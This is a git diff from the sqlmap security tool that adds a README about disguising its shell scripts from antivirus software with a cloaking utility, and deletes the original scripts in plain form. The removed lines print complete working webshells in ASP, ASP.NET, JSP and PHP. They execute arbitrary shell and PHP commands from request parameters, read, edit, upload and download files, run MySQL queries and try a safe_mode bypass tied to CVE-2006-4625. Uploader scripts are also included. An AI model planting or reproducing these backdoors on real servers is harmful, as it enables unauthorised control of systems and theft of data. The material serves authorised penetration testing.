diff --git a/shell/README.txt b/shell/README.txt
new file mode 100644
index 000000000..0bbf1690d
--- /dev/null
+++ b/shell/README.txt
@@ -0,0 +1,10 @@
+Due to the anti-virus positive detection of shell scripts stored inside this folder,
+we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing
+has to be done prior to their usage by sqlmap, but if you want to have access to their
+original source code use the decrypt functionality of the ../extra/cloak/cloak.py utility.
+
+To prepare the original scripts to the cloacked form use this command:
+find backdoor.* uploader.* -type f -exec python ../extra/cloak/cloak.py -i '{}' \;
+
+To get back them into the original form use this:
+find backdoor.*_ uploader.*_ -type f -exec python ../extra/cloak/cloak.py -d -i '{}' \;
\ No newline at end of file
diff --git a/shell/backdoor.asp b/shell/backdoor.asp
deleted file mode 100644
index c2278aaea..000000000
--- a/shell/backdoor.asp
+++ /dev/null
@@ -1,44 +0,0 @@
-
-
-<%
-Set oScript = Server.CreateObject("WSCRIPT.SHELL")
-Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
-Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-
-szCMD = request("cmd")
-
-If (szCMD <> "") Then
- szTempFile = "C:\" & oFileSys.GetTempName()
- Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
- End If
-%>
-
-
-
-
- - -
-
-<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
-
-<%
- If (IsObject(oFile)) Then
- On Error Resume Next
- Response.Write Server.HTMLEncode(oFile.ReadAll)
- oFile.Close
- Call oFileSys.DeleteFile(szTempFile, True)
- End If
-%>
-
-
diff --git a/shell/backdoor.aspx b/shell/backdoor.aspx
deleted file mode 100644
index b420c875a..000000000
--- a/shell/backdoor.aspx
+++ /dev/null
@@ -1,42 +0,0 @@
-<%@ Page Language="C#" Debug="true" Trace="false" %>
-<%@ Import Namespace="System.Diagnostics" %>
-<%@ Import Namespace="System.IO" %>
-
-
-
-awen asp.net webshell
-
-
-
- - -Command: -
-
-
-
-
-
diff --git a/shell/backdoor.jsp b/shell/backdoor.jsp
deleted file mode 100644
index daf430927..000000000
--- a/shell/backdoor.jsp
+++ /dev/null
@@ -1,47 +0,0 @@
-<%@ page import="java.io.*" %>
-<%
-
-Process p;
-String s, cmd, html;
-
-cmd = request.getParameter("cmd");
-if (cmd == null) {
- cmd = "pwd";
-}
-
-String []bashcmd = {"/bin/sh","-c",cmd};
-
-html = request.getParameter("html");
-
-if (html != null) {
- out.println("");
-}
-
-p = Runtime.getRuntime().exec(bashcmd);
-
-BufferedReader stdInput = new BufferedReader(new
- InputStreamReader(p.getInputStream()));
-
-BufferedReader stdError = new BufferedReader(new
- InputStreamReader(p.getErrorStream()));
-
-
-
-while ((s = stdInput.readLine()) != null) {
- out.println(s);
- if (html != null) {
- out.println("
"); - } -} - - -while ((s = stdError.readLine()) != null) { - System.out.println(s); - if (html != null) { - out.println("
"); - } - -} - - -%> \ No newline at end of file diff --git a/shell/backdoor.php b/shell/backdoor.php deleted file mode 100644 index c26589e1d..000000000 --- a/shell/backdoor.php +++ /dev/null @@ -1,302 +0,0 @@ -Error: " . $message . "."; - die($completeMessage); -} - -function getSymbolByQuantity($bytes) { - $symbols=array('B', 'KiB', 'MiB', 'GiB', 'TiB', 'PiB', 'EiB', 'ZiB', 'YiB'); - $exp=@floor(log($bytes)/log(1024)); - - return @sprintf('%.2f ' . $symbols[$exp], ($bytes/pow(1024, @floor($exp)))); -} - -function ex($command) { - $res=''; - if (@function_exists('exec')) { - @exec($command, $res); - $res=@join("\n", $res); - } - elseif (@function_exists('shell_exec')) { - $res=@shell_exec($command); - } - elseif(@function_exists('system')) { - @ob_start(); - @system($command); - $res=@ob_get_contents(); - @ob_end_clean(); - } - elseif (@function_exists('passthru')) { - @ob_start(); - @passthru($command); - $res=@ob_get_contents(); - @ob_end_clean(); - } - elseif (@is_resource($f=@popen($command, "r"))) { - $res=""; - while(!@feof($f)) { - $res .= @fread($f, 1024); - } - @pclose($f); - } - $res=@htmlspecialchars($res); - return $res; -} - -if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) { - echo ""; - echo ""; - echo ""; - echo ""; - echo ""; - echo "sqlmap PHP backdoor"; - echo "

sqlmap PHP backdoor


"; - echo "

System information: here
"; - echo "PHP info: here
"; - echo "Send an email: here

"; - echo "
Read a file

"; - echo "
Edit a file

"; - echo "
Download a file
Directory:
File:

"; - echo "
Upload a file

to directory:

"; - echo "
Browse a directory

"; - echo "
Execute a shell command

"; - echo "
Execute a PHP command

"; - echo "
Execute a MySQL query
host:
user:
password:
query:

"; - echo "
"; -} - -if (isset($_REQUEST["sysinfo"])) { - if (@strtolower(@substr(@PHP_OS, 0, 3)) == "win") { - $win=1; - } - else { - $win=0; - } - $safeMode=@ini_get("safe_mode"); - $openBaseDir=@ini_get("open_basedir"); - if ($safeMode || $openBaseDir) { - /** - * Exploit CVE: CVE-2006-4625 - * Affected Software: PHP 5.1.6 / 4.4.4 < = x - * Advisory URL: http://securityreason.com/achievement_securityalert/42 - * Try to restore to default value - */ - ini_restore("safe_mode"); - ini_restore("open_basedir"); - } - $magicQuotesGpc=@ini_get("magic_quotes_gpc"); - $dir=@getcwd(); - $total=@disk_total_space($dir); - $free=@disk_free_space($dir); - echo "Operating system
" . @PHP_OS;
-    echo "
Server uname
" . php_uname();
-    echo "
Server uptime
";
-    echo  (!$win) ? ex("uptime") : ex("net statistics server");
-    echo "
Server time
";
-    echo date("D, M d, h:iA");
-    echo "
Disk space
";
-    echo "Total space: " . getSymbolByQuantity($total) . "
"; - echo "Free space: " . getSymbolByQuantity($free); - echo "
Web server username
";
-    echo (!$win) ? `id` . "
" : @get_current_user(); - echo "
PHP version
" . @phpversion();
-    echo "
PHP safe_mode
";
-    echo ($safeMode) ? "ON
" : "OFF
"; - echo "
PHP open_basedir
";
-    echo ($openBaseDir) ? "ON
" : "OFF
"; - echo "
PHP magic_quotes_gpc
";
-    echo ($magicQuotesGpc) ? "ON
" : "OFF
"; - echo "
CPU information
";
-    echo ex("cat /proc/cpuinfo");
-    echo "
Memory information
";
-    echo ex("cat /proc/meminfo");
-    echo "
Open ports and active connections
";
-    echo (!$win) ? ex("netstat -nat") : ex("netstat -ano");
-    echo "
Network devices
"; 
-    echo (!$win) ? ex("/sbin/ifconfig -a") : ex("ipconfig /all");
-    echo "
Processes
";
-    echo (!$win) ? ex("ps auxfww") : ex("tasklist");
-    echo "
"; - echo ($win) ? "Network use
".ex("net use")."
Network share
".ex("net share")."
Network user
".ex("net user")."
" : ""; -} - -else if(isset($_REQUEST["phpinfo"])) { - echo @phpinfo(); -} - -else if (isset($_REQUEST["readFile"])) { - $file=$_REQUEST["readFile"]; - $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . ""); - $fileContent=@file_get_contents($file); - echo "

File: " . $file . "

"; - echo "

" . @htmlspecialchars($fileContent) . "
"; -} - -else if(isset($_REQUEST["editFile"])) { - $file=$_REQUEST["editFile"]; - if (!$file) { - error("Specify the file to edit"); - } - $fileHandler=@fopen($file, "rb") or error("Unable to read file " . $file . ""); - $fileContent=@file_get_contents($file); - echo "
"; - echo "File:

"; - echo "
"; -} - -else if (isset($_REQUEST["saveFile"])) { - $file=$_REQUEST["saveFile"]; - $newContent=$_REQUEST["contentFile"]; - if (@is_writable($file)) { - $fileHandler=@fopen($file, "w+") or error("Unable to read file " . $file . ""); - @fwrite($fileHandler, $newContent) or error("Unable to write on file " . $file . ""); - echo "File " . $file . " successfully written"; - @fclose($fileHandler); - } - else { - error("File " . $file . " is not writable"); - } -} - -else if (isset($_REQUEST["download"])) { - ob_clean(); - $dir=$_REQUEST["dir"]; - $file=$_REQUEST["download"]; - $filename=$dir. "/" . $file; - $fileHandler=@fopen($filename, "rb") or error("Unable to read file " . $file . ""); - $fileContent=@file_get_contents($filename); - header("Content-type: application/octet-stream"); - header("Content-length: " . strlen($fileContent)); - header("Content-disposition: attachment; filename=" . $file . ";"); - echo $fileContent; - exit; -} - -else if (isset($_REQUEST["upload"])) { - if (!isset($_REQUEST["uploadDir"])) { - error("Specify directory name (ig: /tmp)"); - } - $dir=$_REQUEST["uploadDir"]; - $file=$HTTP_POST_FILES["file"]["name"]; - @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"], $dir . "/" . $file) or error("File upload error"); - @chmod($dir . "/" . $file, 0755) or error("Unable to set file permission on " . $file . ""); - echo "

File " . $file . " successfully uploaded to " . $dir . "

"; -} - -else if (isset($_REQUEST["listDir"])) { - $dirToOpen=$_REQUEST["listDir"]; - $dirHandler=@opendir($dirToOpen) or error("Unable to open directory"); - echo "

Directory: " . $dirToOpen . "

"; - echo ""; - $list=array(); - while ($o=@readdir($dirHandler)) { - $list[]=$o; - } - @closedir($dirHandler); - @sort($list); - foreach ($list as $file) { - if ($file == ".") { - continue; - } - $linkToFile=$dirToOpen . "/" . $file; - $isdir=@is_dir($linkToFile); - $islink=@is_link($linkToFile); - $isfile=@is_file($linkToFile); - echo ""; - if ($isdir) { - echo ""; - echo ""; - $owner=@posix_getpwuid(@fileowner($linkToFile)); - $group=@posix_getgrgid(@filegroup($linkToFile)); - echo ""; - if ($isdir) { - echo ""; - } - else if ($islink) { - echo ""; - } - else if ($isfile) { - echo ""; - } - else { - echo ""; - } - echo (@is_readable($linkToFile) && $isfile) ? "" : ""; - echo (@is_writable($linkToFile) && $isfile) ? "" : ""; - echo (@is_readable($linkToFile) && $isfile) ? "" : ""; - echo ""; - } -} - -else if (isset($_REQUEST["mailForm"])) { - echo ""; - echo ""; - echo "To:

"; - echo "Subject:

"; - echo "Body:

"; - echo ""; -} - -else if (isset($_REQUEST["mail"])) { - $status=@mail($_REQUEST["to"], $_REQUEST["subject"], $_REQUEST["msg"]); - echo $status ? "Mail sent" : "Failed to send mail"; - @exit; -} - -else if (isset($_REQUEST["cmd"])) { - $cmd=$_REQUEST["cmd"]; - echo "

Shell command: " . $cmd . "

"; - echo "
" . ex($cmd) . "
"; -} - -else if(isset($_REQUEST["phpcode"])) { - $code=$_REQUEST["phpcode"]; - echo "

PHP command: " . $code . "

"; - echo "
";
-    echo @eval("print_r($code);");
-    echo "
"; -} - -else if (isset($_REQUEST["query"])) { - $host=$_REQUEST["host"]; - $user=$_REQUEST["user"]; - $password=$_REQUEST["password"]; - $query=$_REQUEST["query"]; - $link=@mysql_connect("$host", "$user", "$password"); - if (!$link) { - error(@mysql_error()); - } - $result=@mysql_query($query); - if (!$result) { - error(@mysql_error()); - } - echo "

MySQL query: " . $query . "

"; - echo "
";
-    while ($row=@mysql_fetch_array($result, MYSQL_ASSOC)) {
-        @print_r($row);
-    }
-    echo "
"; - @mysql_free_result($result); -} - -if (!isset($_REQUEST["download"]) and !isset($_REQUEST["phpinfo"])) { - echo ""; -} -?> diff --git a/shell/uploader.asp b/shell/uploader.asp deleted file mode 100644 index 2a45ccc5a..000000000 --- a/shell/uploader.asp +++ /dev/null @@ -1,2 +0,0 @@ -

sqlmap backdoor uploader

-<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%> diff --git a/shell/uploader.aspx b/shell/uploader.aspx deleted file mode 100644 index e424229ab..000000000 --- a/shell/uploader.aspx +++ /dev/null @@ -1,23 +0,0 @@ -<%@ Page Language="vb" AutoEventWireup="false" Codebehind="uploader.aspx.vb" Inherits="VBNetUpload.WebForm1"%> - - - - WebForm1 - - - - - - - - - - -
- - - - - - - diff --git a/shell/uploader.aspx.vb b/shell/uploader.aspx.vb deleted file mode 100644 index b7a249df4..000000000 --- a/shell/uploader.aspx.vb +++ /dev/null @@ -1,41 +0,0 @@ -Public Class WebForm1 - Inherits System.Web.UI.Page - Protected WithEvents File1 As System.Web.UI.HtmlControls.HtmlInputFile - Protected WithEvents Submit1 As System.Web.UI.HtmlControls.HtmlInputButton - -#Region " Web Form Designer Generated Code " - - 'This call is required by the Web Form Designer. - Private Sub InitializeComponent() - - End Sub - - Private Sub Page_Init(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Init - 'CODEGEN: This method call is required by the Web Form Designer - 'Do not modify it using the code editor. - InitializeComponent() - End Sub - -#End Region - - Private Sub Page_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load - 'Put user code to initialize the page here - End Sub - - Private Sub Submit1_ServerClick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Submit1.ServerClick - - If Not File1.PostedFile Is Nothing And File1.PostedFile.ContentLength > 0 Then - Dim fn As String = System.IO.Path.GetFileName(File1.PostedFile.FileName) - Dim SaveLocation as String = Server.MapPath("Data") & "\" & fn - Try - File1.PostedFile.SaveAs(SaveLocation) - Response.Write("The file has been uploaded.") - Catch Exc As Exception - Response.Write("Error: " & Exc.Message) - End Try - Else - Response.Write("Please select a file to upload.") - End If - - End Sub -End Class diff --git a/shell/uploader.php b/shell/uploader.php deleted file mode 100644 index 2f2efc343..000000000 --- a/shell/uploader.php +++ /dev/null @@ -1,12 +0,0 @@ -sqlmap backdoor uploader

to directory: "; -} -?>
NamePermissionOwner/GroupSizeReadWriteDownload
"; - } - else if ($isfile) { - echo ""; - } - else { - echo "$linkToFile"; - } - echo "$linkToFile" . @substr(@sprintf("%o", @fileperms($linkToFile)), -4) . "" . $owner["name"] . "/" . $group["name"] . "DIRLINK" . @sprintf("%u", @filesize($linkToFile)) . " bytesUnknownRead-Write-Download-